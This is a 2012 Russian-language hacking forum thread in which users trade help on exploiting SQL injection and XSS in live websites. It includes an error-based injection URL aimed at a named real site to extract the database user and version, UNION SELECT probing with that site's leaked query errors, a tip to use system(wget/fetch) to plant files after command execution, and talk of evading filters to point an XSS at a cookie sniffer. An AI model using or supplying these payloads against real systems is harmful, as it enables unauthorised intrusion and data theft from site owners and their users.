27.05.2012, 00:33
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
Сообщение от HeaVeNSeR
ребят,подскажите,плз...как скормить sqlmap'у блайнд-скулю типа этой (suffix .html)
http://site.com/common/
[sql-inj]
.html
havij её норм берет,как http://site.com/common/
%Inject_Here%
.html
и где можно почитать про suffix и prefix в скулях...искал в сети,ничего норм не нашел...?
Подскажите,пожалуйста
В sqlmap поставьте * в том месте где уязвимость.
Пример: http://site.com/common/ *.html
to dynda2000
Почитайте про system(wget/fetch), там же сразу и file_put_contents() и выбирайте как Вам больше по душе!
|
|
|
27.05.2012, 15:59
|
|
Познающий
Регистрация: 02.05.2011
Сообщений: 48
С нами:
7910966
Репутация:
1
|
|
w3af нашёл уязвимость (ocCommanding), первый раз с ней сталкиваюсь как с ней работать?
|
|
|
|
27.05.2012, 17:22
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Всем привет, вобщем такой вопрос
есть скуля в пост запросе
на страницу выводит три ошибки
id=2'
Сообщение от None
Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in /home//public_html/new_stavka.php on line 65
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home//public_html/new_stavka.php on line 71
Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in /home/public_html/new_stavka.php on line 75
начинаю подбирать колонки
на трёх
id=2'+union+select+1,2,3--+
выводит только одну ошибку
mysql_fetch_array()
и обычный текст страницы(прямого вывода на станицу нету), дальше перебераю и имею все теже три ошибки, собствено, дальше крутить нету смысла, как я дальше в таком случае могу получить какойю либо инфу из БД в таком случае? |
|
|
|
27.05.2012, 17:48
|
|
Новичок
Регистрация: 09.01.2012
Сообщений: 21
С нами:
7548086
Репутация:
0
|
|
qaz, error based методом попробывать мб ?
|
|
|
|
27.05.2012, 18:41
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
С нами:
8334326
Репутация:
75
|
|
Сообщение от bodrich
qaz
, error based методом попробывать мб ?
ето не тот вывод об ошибке когда юзают error based
|
|
|
|
27.05.2012, 20:15
|
|
Постоянный
Регистрация: 27.07.2011
Сообщений: 499
С нами:
7787126
Репутация:
53
|
|
Сообщение от justonline
нашел по сути банальную xss в input.
проблема состоит в том, что ничего не фильтруется кроме двойного слеша в ссылке на снифер. // - удаляет. если ///, то оставляет один... дальнейшие манипуляции с слешом не приносят успехов.
знатоки Js, подскажите пожалуйста возможную реализацию, что бы ссылка не фильтровалась. Мне для общего развития, уязвимость все-равно админам сдам. я уже пол ночи сижу и мучаюсь... и табуляцию режет между этими слешами и пробелы.
где то проскакивал способ через eval, но я не осилил.
+ ограничение на 100 символов.
+ работа только в пределах тега
никто не может помочь?)
|
|
|
|
28.05.2012, 00:27
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
С нами:
10095779
Репутация:
137
|
|
Сообщение от justonline
никто не может помочь?)
что на счет того чтоб перевести в урленкод?, или криптованую ссылку где не использауется двойные слеши? вариантов уйма, блескни умом, вопрос достаточно бонален воспользуйся гуглом!!!
|
|
|
|
28.05.2012, 12:36
|
|
Новичок
Регистрация: 30.04.2012
Сообщений: 25
С нами:
7386806
Репутация:
0
|
|
Нашел XSS в post запросе, если я правильно понял то это активка, что через неё сделать можно, если есть полная свобода:
+ни чего ни фильтруется
+работают script src=lyaya.js
и т.д.
|
|
|
|
28.05.2012, 12:47
|
|
Новичок
Регистрация: 12.06.2011
Сообщений: 1
С нами:
7851926
Репутация:
0
|
|
Как победить?
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]tabu72[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ru[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]catalog[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]93[/COLOR][COLOR="#007700"])+[/COLOR][COLOR="#0000BB"]union[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]select[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]+--+[/COLOR][/COLOR]
Выдает
Код:
user warning: You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near 'group by td.name' at line 9 query:
catalog_taxonomy_select_brands /* Гость :
catalog_taxonomy_select_brands */ SELECT td.tid, td.name
FROM term_node tn left join term_node tnn on tn.nid = tnn.nid
left join term_data td on td.tid = tnn.tid left join node n on tn.nid
= n.nid left join content_type_tovar tt on tn.nid = tt.nid WHERE
tn.tid in ( 93) union select 1 -- ) and tnn.tid not in ( 93) union
select 1 -- ) group by td.name in /var/www/sites/tabu72.ru/sites/
all/modules/catalog/catalog.module on line 895. user warning:
The used SELECT statements have a different number of columns
query: pager_query /* Гость : pager_query */ SELECT tn.nid,
td.name, td.tid FROM term_node tn left join term_node tnn on
tn.nid = tnn.nid left join term_data td on td.tid = tnn.tid left join
node n on tn.nid = n.nid left join content_type_tovar tt on tn.nid
= tt.nid WHERE tn.tid in ( 93) union select 1 -- ) and tnn.tid not in
( 93) union select 1 -- ) and IFNULL(tt.field_price_sale_value,
0)=0 and tt.field_dateupdate_value is NULL order by n.title asc
LIMIT 0, 12 in /var/www/sites/tabu72.ru/sites/all/modules/
catalog/catalog.module on line 814.
Параметр используется во множественных запросах. Если добавить еще 1 колонку, то появятся еще 2 ошибки |
|
|
|
28.05.2012, 13:32
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
С нами:
8456812
Репутация:
55
|
|
Сообщение от Vanzent
Как победить?
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]tabu72[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ru[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]catalog[/COLOR][COLOR="#007700"]/[/COLOR][COLOR="#0000BB"]93[/COLOR][COLOR="#007700"])+[/COLOR][COLOR="#0000BB"]union[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]select[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]+--+[/COLOR][/COLOR]
Выдает
Код:
user warning: You have an error in your SQL syntax; check the
manual that corresponds to your MySQL server version for the right syntax to use near 'group by td.name' at line 9 query:
catalog_taxonomy_select_brands /* Гость :
catalog_taxonomy_select_brands */ SELECT td.tid, td.name
FROM term_node tn left join term_node tnn on tn.nid = tnn.nid
left join term_data td on td.tid = tnn.tid left join node n on tn.nid
= n.nid left join content_type_tovar tt on tn.nid = tt.nid WHERE
tn.tid in ( 93) union select 1 -- ) and tnn.tid not in ( 93) union
select 1 -- ) group by td.name in /var/www/sites/tabu72.ru/sites/
all/modules/catalog/catalog.module on line 895. user warning:
The used SELECT statements have a different number of columns
query: pager_query /* Гость : pager_query */ SELECT tn.nid,
td.name, td.tid FROM term_node tn left join term_node tnn on
tn.nid = tnn.nid left join term_data td on td.tid = tnn.tid left join
node n on tn.nid = n.nid left join content_type_tovar tt on tn.nid
= tt.nid WHERE tn.tid in ( 93) union select 1 -- ) and tnn.tid not in
( 93) union select 1 -- ) and IFNULL(tt.field_price_sale_value,
0)=0 and tt.field_dateupdate_value is NULL order by n.title asc
LIMIT 0, 12 in /var/www/sites/tabu72.ru/sites/all/modules/
catalog/catalog.module on line 814.
Параметр используется во множественных запросах. Если добавить еще 1 колонку, то появятся еще 2 ошибки http://tabu72.ru/catalog/93)or(select(1)from(select+count(0),concat((select (concat_ws(0x3b,user(),version()))),floor(rand(0)* 2))from(term_node)+group+by+2)a)--+
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
